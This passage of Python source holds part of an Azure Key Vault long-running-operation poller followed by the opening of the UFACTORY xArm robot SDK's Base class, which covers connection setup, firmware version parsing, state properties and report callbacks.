from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.pipeline.transport._base import HttpResponse # type: ignore
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
# type: (PollingMethod) -> None
# pylint: disable=super-init-not-called
self._polling_method = polling_method
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
# pylint: disable=arguments-differ
def result(self):
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a number of seconds.
You can use the "done()" method to check whether the operation completed or this call merely timed out.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="KeyVaultOperationPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
raise self._exception # type: ignore
except TypeError: # Was None
pass
class RecoverDeletedPollingMethod(PollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._status = initial_status
self._finished_status = finished_status
def _update_status(self):
# type: () -> None
try:
self._command()
self._status = self._finished_status
except ResourceNotFoundError:
pass
except HttpResponseError as e:
if e.status_code == 403:
self._status = self._finished_status
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._status == self._finished_status
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return self._status
class DeletePollingMethod(RecoverDeletedPollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, sd_disabled, interval=2):
self._sd_disabled = sd_disabled
super(DeletePollingMethod, self).__init__(
command=command,
final_resource=final_resource,
initial_status=initial_status,
finished_status=finished_status,
interval=interval
)
def finished(self):
# type: () -> bool
return self._sd_disabled or self._status == self._finished_status
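# --- Illustrative wiring sketch (not part of the SDK; the names below are hypothetical) ---
# KeyVaultOperationPoller.result() returns the cached resource immediately, while wait() drives the
# polling method on a daemon thread until finished() is true. The stand-in command here succeeds on
# its first call, which _update_status() treats as "the operation has completed"; raising
# ResourceNotFoundError instead would mean "keep polling".
def _example_delete_poller():
    def _get_deleted_secret():
        # a real client would issue an HTTP GET here and let a 404 raise ResourceNotFoundError
        return None

    polling_method = DeletePollingMethod(
        command=_get_deleted_secret,
        final_resource={"name": "example-secret"},  # placeholder for the deserialized resource
        initial_status="deleting",
        finished_status="deleted",
        sd_disabled=False,
    )
    poller = KeyVaultOperationPoller(polling_method)
    resource = poller.result()  # returns final_resource without waiting for completion
    poller.wait()  # blocks until finished(); relies on LROPoller._start from azure-core to call run()
    return resource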
|
base.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
import re
import time
import math
import threading
try:
from multiprocessing.pool import ThreadPool
except ImportError:
ThreadPool = None
try:
import asyncio
except ImportError:
asyncio = None
from .events import Events
from ..core.config.x_config import XCONF
from ..core.comm import SerialPort, SocketPort
from ..core.wrapper import UxbusCmdSer, UxbusCmdTcp
from ..core.utils.log import logger, pretty_print
from ..core.utils import convert
from ..core.config.x_code import ControllerWarn, ControllerError, ControllerErrorCodeMap, ControllerWarnCodeMap
from .utils import xarm_is_connected, compare_time, compare_version, xarm_is_not_simulation_mode, filter_invaild_number, xarm_is_pause, xarm_wait_until_cmdnum_lt_max
from .code import APIState
from ..tools.threads import ThreadManage
from ..version import __version__
controller_error_keys = ControllerErrorCodeMap.keys()
controller_warn_keys = ControllerWarnCodeMap.keys()
print('SDK_VERSION: {}'.format(__version__))
class Base(Events):
def __init__(self, port=None, is_radian=False, do_not_open=False, **kwargs):
if kwargs.get('init', False):
super(Base, self).__init__()
self._port = port
self._debug = kwargs.get('debug', False)
self._baudrate = kwargs.get('baudrate', XCONF.SerialConf.SERIAL_BAUD)
self._timeout = kwargs.get('timeout', None)
self._filters = kwargs.get('filters', None)
self._enable_heartbeat = kwargs.get('enable_heartbeat', False)
self._enable_report = kwargs.get('enable_report', True)
self._report_type = kwargs.get('report_type', 'rich')
self._forbid_uds = kwargs.get('forbid_uds', False)
self._check_tcp_limit = kwargs.get('check_tcp_limit', False)
self._check_joint_limit = kwargs.get('check_joint_limit', True)
self._check_cmdnum_limit = kwargs.get('check_cmdnum_limit', True)
self._check_simulation_mode = kwargs.get('check_simulation_mode', True)
self._max_cmd_num = kwargs.get('max_cmdnum', 512)
if not isinstance(self._max_cmd_num, int):
self._max_cmd_num = 512
self._max_cmd_num = min(XCONF.MAX_CMD_NUM, self._max_cmd_num)
self._check_robot_sn = kwargs.get('check_robot_sn', False)
self._check_is_ready = kwargs.get('check_is_ready', True)
self._check_is_pause = kwargs.get('check_is_pause', True)
self._timed_comm = kwargs.get('timed_comm', True)
self._timed_comm_interval = kwargs.get('timed_comm_interval', 30)
self._timed_comm_t = None
self._timed_comm_t_alive = False
self._max_callback_thread_count = kwargs.get('max_callback_thread_count', 0)
self._asyncio_loop = None
self._asyncio_loop_alive = False
self._asyncio_loop_thread = None
self._pool = None
self._thread_manage = ThreadManage()
self._rewrite_modbus_baudrate_method = kwargs.get('rewrite_modbus_baudrate_method', True)
self._min_tcp_speed, self._max_tcp_speed = 0.1, 1000 # mm/s
self._min_tcp_acc, self._max_tcp_acc = 1.0, 50000 # mm/s^2
self._tcp_jerk = 1000 # mm/s^3
self._min_joint_speed, self._max_joint_speed = 0.01, 4.0 # rad/s
self._min_joint_acc, self._max_joint_acc = 0.01, 20.0 # rad/s^2
self._joint_jerk = 20.0 # rad/s^3
self._rot_jerk = 2.3
self._max_rot_acc = 2.7
self._stream_type = 'serial'
self._stream = None
self.arm_cmd = None
self._stream_report = None
self._report_thread = None
self._only_report_err_warn_changed = True
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._control_box_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._pose_aa = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0]  # joint torques
self._tcp_load = [0, [0, 0, 0]]  # payload [weight, centre of gravity], i.e. [weight, [x, y, z]]
self._collision_sensitivity = 0  # collision sensitivity
self._teach_sensitivity = 0  # teach sensitivity
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_type = XCONF.Robot.Type.XARM7_X4
self._arm_axis = XCONF.Robot.Axis.XARM7
axis = kwargs.get('axis', self._arm_axis)
if axis in [5, 6, 7]:
self._arm_axis = axis
arm_type = kwargs.get('type', self._arm_type)
if arm_type in [3, 5, 6, 7, 8]:
self._arm_type = arm_type
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._default_is_radian = is_radian
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0  # firmware major version number
self._minor_version_number = 0  # firmware minor version number
self._revision_version_number = 0  # firmware revision (patch) version number
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._pause_cond = threading.Condition()
self._pause_lock = threading.Lock()
self._pause_cnts = 0
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
self._iden_progress = 0
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
self._arm_type_is_1300 = False
self._control_box_type_is_1300 = False
self.linear_track_baud = -1
self.linear_track_speed = 1
self.linear_track_is_enabled = False
self._ft_ext_force = [0, 0, 0, 0, 0, 0]
self._ft_raw_force = [0, 0, 0, 0, 0, 0]
self._has_motion_cmd = False
self._need_sync = False
if not do_not_open:
self.connect()
def _init(self):
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._control_box_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._pose_aa = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0]  # joint torques
self._tcp_load = [0, [0, 0, 0]]  # payload [weight, centre of gravity], i.e. [weight, [x, y, z]]
self._collision_sensitivity = 0  # collision sensitivity
self._teach_sensitivity = 0  # teach sensitivity
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0  # firmware major version number
self._minor_version_number = 0  # firmware minor version number
self._revision_version_number = 0  # firmware revision (patch) version number
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._pause_cond = threading.Condition()
self._pause_lock = threading.Lock()
self._pause_cnts = 0
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self._iden_progress = 0
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
self._arm_type_is_1300 = False
self._control_box_type_is_1300 = False
self.linear_track_baud = -1
self.linear_track_speed = 1
self.linear_track_is_enabled = False
self._ft_ext_force = [0, 0, 0, 0, 0, 0]
self._ft_raw_force = [0, 0, 0, 0, 0, 0]
self._has_motion_cmd = False
self._need_sync = False
@staticmethod
def log_api_info(msg, *args, code=0, **kwargs):
if code == 0:
logger.info(msg, *args, **kwargs)
else:
logger.error(msg, *args, **kwargs)
def _check_version(self, is_first=False):
if is_first:
self._version = None
self._robot_sn = None
self._control_box_sn = None
try:
if not self._version:
self.get_version()
if is_first:
fail_cnt = 0
while not self._version and fail_cnt < 100:
code, _ = self.get_version()
fail_cnt += 1 if code != 0 else 0
if code != 0 or not self._version:
time.sleep(0.1)
if not self._version and fail_cnt >= 100:
logger.error('failed to get version')
return -2
if self._version and isinstance(self._version, str):
pattern = re.compile(
r'.*(\d+),(\d+),(\S+),(\S+),.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(xarm_axis, xarm_type, xarm_sn, ac_version,
major_version_number,
minor_version_number,
revision_version_number) = m.groups()
self._arm_axis = int(xarm_axis)
self._arm_type = int(xarm_type)
self._major_version_number = int(major_version_number)
self._minor_version_number = int(minor_version_number)
self._revision_version_number = int(revision_version_number)
self._robot_sn = xarm_sn
self._control_box_sn = ac_version.strip()
self._arm_type_is_1300 = int(xarm_sn[2:6]) >= 1300 if xarm_sn[2:6].isdigit() else False
self._control_box_type_is_1300 = int(ac_version[2:6]) >= 1300 if ac_version[2:6].isdigit() else False
else:
pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(self._major_version_number,
self._minor_version_number,
self._revision_version_number) = map(int, m.groups())
else:
version_date = '-'.join(self._version.split('-')[-3:])
self._is_old_protocol = compare_time('2019-02-01', version_date)
if self._is_old_protocol:
self._major_version_number = 0
self._minor_version_number = 0
self._revision_version_number = 1
else:
self._major_version_number = 0
self._minor_version_number = 1
self._revision_version_number = 0
if is_first:
if self._check_robot_sn:
count = 2
self.get_robot_sn()
while not self._robot_sn and count and self.warn_code == 0:
self.get_robot_sn()
self.get_err_warn_code()
if not self._robot_sn and self.warn_code == 0 and count:
time.sleep(0.1)
count -= 1
if self.warn_code != 0:
self.clean_warn()
print('FIRMWARE_VERSION: v{}, PROTOCOL: {}, DETAIL: {}'.format(
'{}.{}.{}'.format(self._major_version_number, self._minor_version_number, self._revision_version_number),
'V0' if self._is_old_protocol else 'V1', self._version
))
return 0
except Exception as e:
print('compare_time: {}, {}'.format(self._version, e))
return -1
@property
def realtime_tcp_speed(self):
return self._realtime_tcp_speed
@property
def realtime_joint_speeds(self):
return [speed if self._default_is_radian else math.degrees(speed) for speed in self._realtime_joint_speeds]
@property
def version_number(self):
return self._major_version_number, self._minor_version_number, self._revision_version_number
@property
def connected(self):
return self._stream and self._stream.connected
@property
def ready(self):
return self._is_ready
@property
def default_is_radian(self):
return self._default_is_radian
@property
def is_simulation_robot(self):
return self._is_simulation_robot
def check_is_simulation_robot(self):
return self._check_simulation_mode and self.is_simulation_robot
# return self._check_simulation_mode and self.mode != 4
@property
def version(self):
if not self._version:
self.get_version()
return self._version
# return 'v' + '.'.join(map(str, self.version_number))
@property
def sn(self):
return self._robot_sn
@property
def control_box_sn(self):
return self._control_box_sn
@property
def position(self):
if not self._enable_report:
self.get_position()
return [math.degrees(self._position[i]) if 2 < i < 6 and not self._default_is_radian
else self._position[i] for i in range(len(self._position))]
@property
def position_aa(self):
if not self._enable_report:
self.get_position_aa()
return [math.degrees(self._pose_aa[i]) if 2 < i < 6 and not self._default_is_radian
else self._pose_aa[i] for i in range(len(self._pose_aa))]
@property
def tcp_jerk(self):
return self._tcp_jerk
@property
def tcp_speed_limit(self):
return [self._min_tcp_speed, self._max_tcp_speed]
@property
def tcp_acc_limit(self):
return [self._min_tcp_acc, self._max_tcp_acc]
@property
def last_used_position(self):
return [math.degrees(self._last_position[i]) if 2 < i < 6 and not self._default_is_radian
else self._last_position[i] for i in range(len(self._last_position))]
@property
def last_used_tcp_speed(self):
return self._last_tcp_speed
@property
def last_used_tcp_acc(self):
return self._last_tcp_acc
@property
def angles(self):
if not self._enable_report:
self.get_servo_angle()
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._angles]
@property
def joint_jerk(self):
return self._joint_jerk if self._default_is_radian else math.degrees(self._joint_jerk)
@property
def joint_speed_limit(self):
limit = [self._min_joint_speed, self._max_joint_speed]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def joint_acc_limit(self):
limit = [self._min_joint_acc, self._max_joint_acc]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def last_used_angles(self):
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._last_angles]
@property
def last_used_joint_speed(self):
return self._last_joint_speed if self._default_is_radian else math.degrees(self._last_joint_speed)
@property
def last_used_joint_acc(self):
return self._last_joint_acc if self._default_is_radian else math.degrees(self._last_joint_acc)
@property
def position_offset(self):
return [math.degrees(self._position_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._position_offset[i] for i in range(len(self._position_offset))]
@property
def world_offset(self):
return [math.degrees(self._world_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._world_offset[i] for i in range(len(self._world_offset))]
@property
def state(self):
if not self._enable_report:
self.get_state()
return self._state
@property
def mode(self):
return self._mode
@property
def joints_torque(self):
return self._joints_torque
@property
def tcp_load(self):
return self._tcp_load
@property
def collision_sensitivity(self):
return self._collision_sensitivity
@property
def teach_sensitivity(self):
return self._teach_sensitivity
@property
def motor_brake_states(self):
return self._arm_motor_brake_states
@property
def motor_enable_states(self):
return self._arm_motor_enable_states
@property
def temperatures(self):
return self._temperatures
@property
def error_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._error_code
@property
def warn_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._warn_code
@property
def has_error(self):
return self.error_code != 0
@property
def has_warn(self):
return self.warn_code != 0
@property
def has_err_warn(self):
return self.has_error or self._warn_code != 0 or (self.arm_cmd and self.arm_cmd.has_err_warn)
@property
def cmd_num(self):
if not self._enable_report:
self.get_cmdnum()
return self._cmd_num
@property
def device_type(self):
return self._arm_type
@property
def axis(self):
return self._arm_axis
@property
def master_id(self):
return self._arm_master_id
@property
def slave_id(self):
return self._arm_slave_id
@property
def motor_tid(self):
return self._arm_motor_tid
@property
def motor_fid(self):
return self._arm_motor_fid
@property
def gravity_direction(self):
return self._gravity_direction
@property
def gpio_reset_config(self):
return [self._cgpio_reset_enable, self._tgpio_reset_enable]
@property
def count(self):
return self._count
@property
def servo_codes(self):
return self._servo_codes
@property
def is_stop(self):
return self.state in [4, 5]
@property
def voltages(self):
return self._voltages
@property
def currents(self):
return self._currents
@property
def cgpio_states(self):
return self._cgpio_states
@property
def self_collision_params(self):
return [self._is_collision_detection, self._collision_tool_type, self._collision_tool_params]
@property
def ft_ext_force(self):
return self._ft_ext_force
@property
def ft_raw_force(self):
return self._ft_raw_force
def version_is_ge(self, major, minor=0, revision=0):
if self._version is None:
self._check_version()
return self._major_version_number > major or (
self._major_version_number == major and self._minor_version_number > minor) or (
self._major_version_number == major and self._minor_version_number == minor and
self._revision_version_number >= revision)
def check_is_pause(self):
if self._check_is_pause:
if self.state == 3 and self._enable_report:
with self._pause_cond:
with self._pause_lock:
self._pause_cnts += 1
self._pause_cond.wait()
with self._pause_lock:
self._pause_cnts -= 1
@property
def state_is_ready(self):
if self._check_is_ready and not self.version_is_ge(1, 5, 20):
return self.ready
else:
return True
def _timed_comm_thread(self):
self._timed_comm_t_alive = True
cnt = 0
while self.connected and self._timed_comm_t_alive:
if self.arm_cmd and time.time() - self.arm_cmd.last_comm_time > self._timed_comm_interval:
try:
if cnt == 0:
code, _ = self.get_cmdnum()
elif cnt == 1:
code, _ = self.get_state()
else:
code, _ = self.get_err_warn_code()
cnt = (cnt + 1) % 3
except:
pass
time.sleep(0.5)
def _clean_thread(self):
self._thread_manage.join(1)
if self._pool:
try:
self._pool.close()
self._pool.join()
except:
pass
def connect(self, port=None, baudrate=None, timeout=None, axis=None, arm_type=None):
if self.connected:
return
if axis in [5, 6, 7]:
self._arm_axis = axis
if arm_type in [3, 5, 6, 7]:
self._arm_type = arm_type
self._is_ready = True
self._port = port if port is not None else self._port
self._baudrate = baudrate if baudrate is not None else self._baudrate
self._timeout = timeout if timeout is not None else self._timeout
if not self._port:
raise Exception('can not connect to port/ip {}'.format(self._port))
if self._timed_comm_t is not None:
try:
self._timed_comm_t_alive = False
self._timed_comm_t.join()
self._timed_comm_t = None
except:
pass
self._is_first_report = True
self._first_report_over = False
self._init()
if isinstance(self._port, (str, bytes)):
if self._port == 'localhost' or re.match(
r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
self._port):
self._stream = SocketPort(self._port, XCONF.SocketConf.TCP_CONTROL_PORT,
heartbeat=self._enable_heartbeat,
buffer_size=XCONF.SocketConf.TCP_CONTROL_BUF_SIZE, forbid_uds=self._forbid_uds)
if not self.connected:
raise Exception('connect socket failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdTcp(self._stream)
self._stream_type = 'socket'
try:
if self._timed_comm:
self._timed_comm_t = threading.Thread(target=self._timed_comm_thread, daemon=True)
self._timed_comm_t.start()
except:
pass
self._stream_report = None
try:
self._connect_report()
except:
self._stream_report = None
if self._check_version(is_first=True) < 0:
self.disconnect()
raise Exception('failed to check version, close')
self.arm_cmd.set_debug(self._debug)
if self._max_callback_thread_count < 0 and asyncio is not None:
self._asyncio_loop = asyncio.new_event_loop()
self._asyncio_loop_thread = threading.Thread(target=self._run_asyncio_loop, daemon=True)
self._thread_manage.append(self._asyncio_loop_thread)
self._asyncio_loop_thread.start()
elif self._max_callback_thread_count > 0 and ThreadPool is not None:
self._pool = ThreadPool(self._max_callback_thread_count)
if self._stream.connected and self._enable_report:
self._report_thread = threading.Thread(target=self._report_thread_handle, daemon=True)
self._report_thread.start()
self._thread_manage.append(self._report_thread)
self._report_connect_changed_callback()
else:
self._stream = SerialPort(self._port)
if not self.connected:
raise Exception('connect serial failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdSer(self._stream)
self._stream_type = 'serial'
if self._max_callback_thread_count < 0 and asyncio is not None:
self._asyncio_loop = asyncio.new_event_loop()
self._asyncio_loop_thread = threading.Thread(target=self._run_asyncio_loop, daemon=True)
self._thread_manage.append(self._asyncio_loop_thread)
self._asyncio_loop_thread.start()
elif self._max_callback_thread_count > 0 and ThreadPool is not None:
self._pool = ThreadPool(self._max_callback_thread_count)
if self._enable_report:
self._report_thread = threading.Thread(target=self._auto_get_report_thread, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback(True, True)
self._thread_manage.append(self._report_thread)
else:
self._report_connect_changed_callback(True, False)
self._check_version(is_first=True)
self.arm_cmd.set_debug(self._debug)
self.set_timeout(self._cmd_timeout)
if self._rewrite_modbus_baudrate_method:
setattr(self.arm_cmd, 'set_modbus_baudrate_old', self.arm_cmd.set_modbus_baudrate)
setattr(self.arm_cmd, 'set_modbus_baudrate', self._core_set_modbus_baudrate)
if asyncio:
def _run_asyncio_loop(self):
@asyncio.coroutine
def _asyncio_loop():
logger.debug('asyncio thread start ...')
while self.connected:
yield from asyncio.sleep(0.001)
logger.debug('asyncio thread exit ...')
try:
asyncio.set_event_loop(self._asyncio_loop)
self._asyncio_loop_alive = True
self._asyncio_loop.run_until_complete(_asyncio_loop())
except Exception as e:
pass
self._asyncio_loop_alive = False
@staticmethod
@asyncio.coroutine
def _async_run_callback(callback, msg):
yield from callback(msg)
def _run_callback(self, callback, msg, name='', enable_callback_thread=True):
try:
if self._asyncio_loop_alive and enable_callback_thread:
coroutine = self._async_run_callback(callback, msg)
asyncio.run_coroutine_threadsafe(coroutine, self._asyncio_loop)
elif self._pool is not None and enable_callback_thread:
self._pool.apply_async(callback, args=(msg,))
else:
callback(msg)
except Exception as e:
logger.error('run {} callback exception: {}'.format(name, e))
def _core_set_modbus_baudrate(self, baudrate, use_old=False):
"""
This method overrides core.set_modbus_baudrate and exists mainly for compatibility with old code.
New code should call set_tgpio_modbus_baudrate directly.
:param baudrate:
:param use_old:
    True: call the original core.set_modbus_baudrate method
    False: use the new set_tgpio_modbus_baudrate
:return: [code, ...]
"""
if not use_old:
ret = self.set_tgpio_modbus_baudrate(baudrate)
return [ret, self.modbus_baud]
else:
return self.arm_cmd.set_modbus_baudrate_old(baudrate)
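# Illustrative note (an assumption drawn from connect() above, not from the SDK docs): with the
# default rewrite_modbus_baudrate_method=True, connect() re-binds arm_cmd.set_modbus_baudrate to
# the wrapper above, so legacy code such as
#     arm.arm_cmd.set_modbus_baudrate(2000000)          # example baud value
# transparently goes through set_tgpio_modbus_baudrate(), while
#     arm.arm_cmd.set_modbus_baudrate(2000000, use_old=True)
# still reaches the original implementation via set_modbus_baudrate_old.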
def disconnect(self):
try:
self._stream.close()
except:
pass
if self._stream_report:
try:
self._stream_report.close()
except:
pass
self._is_ready = False
try:
self._stream.join()
except:
pass
if self._stream_report:
try:
self._stream_report.join()
except:
pass
self._report_connect_changed_callback(False, False)
with self._pause_cond:
self._pause_cond.notify_all()
self._clean_thread()
def set_timeout(self, timeout):
self._cmd_timeout = timeout
if self.arm_cmd is not None:
self._cmd_timeout = self.arm_cmd.set_timeout(self._cmd_timeout)
return self._cmd_timeout
def _connect_report(self):
if self._enable_report:
if self._stream_report:
try:
self._stream_report.close()
except:
pass
time.sleep(2)
if self._report_type == 'real':
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_REAL_PORT,
buffer_size=1024 if not self._is_old_protocol else 87,
forbid_uds=self._forbid_uds)
elif self._report_type == 'normal':
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_NORM_PORT,
buffer_size=XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE if not self._is_old_protocol else 87,
forbid_uds=self._forbid_uds)
else:
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_RICH_PORT,
buffer_size=1024 if not self._is_old_protocol else 187,
forbid_uds=self._forbid_uds)
def __report_callback(self, report_id, item, name=''):
if report_id in self._report_callbacks.keys():
for callback in self._report_callbacks[report_id]:
self._run_callback(callback, item, name=name)
def _report_connect_changed_callback(self, main_connected=None, report_connected=None):
if self.REPORT_CONNECT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CONNECT_CHANGED_ID]:
self._run_callback(callback, {
'connected': self._stream and self._stream.connected if main_connected is None else main_connected,
'reported': self._stream_report and self._stream_report.connected if report_connected is None else report_connected,
}, name='connect_changed')
def _report_state_changed_callback(self):
if self._ignore_state:
return
self.__report_callback(self.REPORT_STATE_CHANGED_ID, {'state': self._state}, name='state_changed')
def _report_mode_changed_callback(self):
self.__report_callback(self.REPORT_MODE_CHANGED_ID, {'mode': self._mode}, name='mode_changed')
def _report_mtable_mtbrake_changed_callback(self):
self.__report_callback(self.REPORT_MTABLE_MTBRAKE_CHANGED_ID, {
'mtable': [bool(i) for i in self._arm_motor_enable_states],
'mtbrake': [bool(i) for i in self._arm_motor_brake_states]
}, name='(mtable/mtbrake)_changed')
def _report_error_warn_changed_callback(self):
if self._ignore_error:
return
self.__report_callback(self.REPORT_ERROR_WARN_CHANGED_ID, {
'warn_code': self._warn_code,
'error_code': self._error_code,
}, name='(error/warn)_changed')
def _report_cmdnum_changed_callback(self):
self.__report_callback(self.REPORT_CMDNUM_CHANGED_ID, {
'cmdnum': self._cmd_num
}, name='cmdnum_changed')
def _report_temperature_changed_callback(self):
self.__report_callback(self.REPORT_TEMPERATURE_CHANGED_ID, {
